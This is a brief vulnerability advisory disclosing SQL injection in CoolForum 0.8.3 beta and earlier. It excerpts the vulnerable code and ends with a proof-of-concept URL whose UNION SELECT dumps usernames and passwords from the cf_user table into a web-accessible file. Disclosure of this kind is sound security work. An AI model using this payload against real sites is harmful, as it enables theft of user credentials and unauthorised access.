Type: SQL Injection Risk: Critical Product: CoolForum <= 0.8.3 beta ******************************** Vulnerability ************* // File: editpost.php // Line 38 // if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']); else $post = 0; -- // Line 77 // $canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']); -- // File: admin/functions.php // Line 623 // function getrightedit($idpost,$forumid) { global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM; $query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpost=".$idpost); $j = mysql_fetch_array($query); -- Proof Of Concept **************** http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1 Credits ******* Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt Note: Others SQL Injection exists but they are difficult to exploit by DarkFig